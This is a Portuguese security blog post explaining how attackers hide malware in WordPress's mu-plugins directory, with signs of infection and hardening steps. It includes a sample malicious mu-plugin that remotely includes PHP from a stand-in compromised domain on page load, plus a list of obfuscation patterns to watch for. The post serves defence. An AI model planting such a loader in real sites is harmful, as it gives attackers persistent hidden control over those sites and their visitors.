Pesquisar

Hackers Estão Usando o Diretório mu-plugins para Injetar Malwares em Sites WordPress

A comunidade WordPress vem enfrentando uma nova onda de ataques direcionados ao diretório mu-plugins (Must-Use Plugins). Hackers estão explorando essa funcionalidade pouco conhecida, porém poderosa, para injetar malwares de forma silenciosa e persistente em sites WordPress.

Esse tipo de ataque passa despercebido por muitos administradores, pois os plugins do diretório mu-plugins não aparecem na área de plugins do painel administrativo, o que os torna um vetor perfeito para atividades maliciosas.

Neste artigo do Blog Dolutech, você entenderá:

  • O que é o diretório mu-plugins;
  • Como os atacantes estão usando esse recurso para injetar código malicioso;
  • Como identificar infecções ativas no seu site;
  • E um guia prático de medidas de proteção e verificação completa para garantir a segurança do seu WordPress.
image
mu-plugins

O que é o diretório mu-plugins?

O diretório mu-plugins, sigla para Must-Use Plugins, é uma funcionalidade nativa do WordPress introduzida para permitir que plugins sejam executados automaticamente sem poderem ser desativados via painel administrativo.

Características:

  • Localização padrão: wp-content/mu-plugins/
  • Todos os arquivos PHP nesse diretório são carregados automaticamente pelo WordPress;
  • Os plugins MU não aparecem na lista de plugins padrão (Aparência > Plugins);
  • São úteis para configurações críticas ou funções globais no site.

Infelizmente, esse recurso também pode ser explorado por cibercriminosos para inserir código malicioso que se executa silenciosamente em segundo plano.

Como Hackers Estão Explorando o mu-plugins

Vetores de Ataque Comuns:

  1. Invasão Inicial: via plugins vulneráveis, temas desatualizados ou senhas fracas.
  2. Upload do Código Malicioso: o invasor envia um arquivo PHP para o diretório mu-plugins.
  3. Execução Automática: o código é carregado pelo WordPress assim que o site é acessado.
  4. Persistência: mesmo que o administrador limpe os plugins normais, o malware permanece escondido no mu-plugins.
  5. Funções Maliciosas: envio de SPAM, redirecionamentos, mineração de criptomoedas, injeção de backdoors, roubo de credenciais.

Exemplo de malware no mu-plugins:

<?php
// mu-plugin malicioso
add_action('init', function() {
    if (!is_admin()) {
        include_once("https://dominio-comprometido.com/malware.php");
    }
});

Indícios de Comprometimento via mu-plugins

  • Redirecionamentos aleatórios no site
  • Baixo desempenho ou sobrecarga de CPU
  • Notificações de listas de spam (SpamHaus, Google Safe Browsing)
  • Presença de arquivos desconhecidos em wp-content/mu-plugins
  • Comunicação frequente com domínios suspeitos

Guia de Verificação Completa do mu-plugins

1. Verifique a existência do diretório

ls -la wp-content/mu-plugins

Se o diretório não existir, ótimo. Mas se existir, você precisa verificar o conteúdo manualmente.

Lembre-se que o mu-plugins é amplamente usado para funções de plugins de manutenção de sites como por exemplo o famoso plugin ManageWP.

2. Analise o conteúdo

Revise todos os arquivos no diretório mu-plugins.

cat wp-content/mu-plugins/nome-do-arquivo.php

Desconfie de:

  • Código ofuscado (base64, eval, gzinflate)
  • Instruções de inclusão remota (como include('http://malicioso.com'))
  • Chamadas para funções obscuras ou injeções JavaScript

3. Valide com antivírus e ferramentas de varredura

Utilize ferramentas de segurança para escanear:

  • Wordfence
  • MalCare
  • VirusTotal (suba o arquivo manualmente)
  • ClamAV (servidores Linux)
  • WAF

4. Monitore alterações no diretório

Configure uma ferramenta como:

inotifywait -m -r wp-content/mu-plugins

Ou use plugins como:

  • WP Security Audit Log
  • Sucuri Security
  • Activity Log

omo se Proteger Contra Injeções em mu-plugins

1. Restrinja permissões do diretório

Evite que qualquer processo PHP possa gravar diretamente nesse diretório:

chmod -R 755 wp-content/mu-plugins
chown -R root:www-data wp-content/mu-plugins

Opcionalmente, remova o diretório se não estiver em uso:

rm -rf wp-content/mu-plugins

2. Bloqueie uploads maliciosos com .htaccess (Apache)

Crie ou edite o arquivo .htaccess dentro de wp-content/mu-plugins/:

<Files *.php>
  Order allow,deny
  Deny from all
</Files>

3. Utilize WAF (Web Application Firewall)

Ferramentas como:

  • Cloudflare WAF
  • Imunify360
  • BitNinja
  • CPGuard

podem bloquear uploads não autorizados e injeções de código.

4. Automatize auditorias com WP-CLI

Execute regularmente:

wp plugin list
wp eval-file wp-content/mu-plugins/checar.php

E gere hashes de integridade para monitoramento:

sha256sum wp-content/mu-plugins/* > mu-plugins-hashes.txt

Recomendações Finais da Dolutech

  • Audite seu site regularmente, mesmo que não note comportamento estranho;
  • Eduque sua equipe sobre os riscos de temas e plugins piratas;
  • Evite permissões 777 ou proprietários incorretos em diretórios WordPress;
  • Use 2FA e senhas fortes, principalmente para administradores;
  • Realize backups diários com retenção de 7 dias, para garantir rollback em caso de infecção.

Conclusão

O uso malicioso do diretório mu-plugins é uma técnica sorrateira, mas poderosa, empregada por cibercriminosos para comprometer sites WordPress sem serem detectados. Por não aparecer no painel de administração, muitos administradores sequer imaginam que podem estar infectados.

A Dolutech recomenda monitoramento contínuo, inspeção manual desse diretório e adoção de medidas preventivas imediatas. Manter-se informado e proativo é a chave para manter sua aplicação segura.

Conheça nosso Canal do Youtube
Escute Nosso DoluCast
Melhores da Semana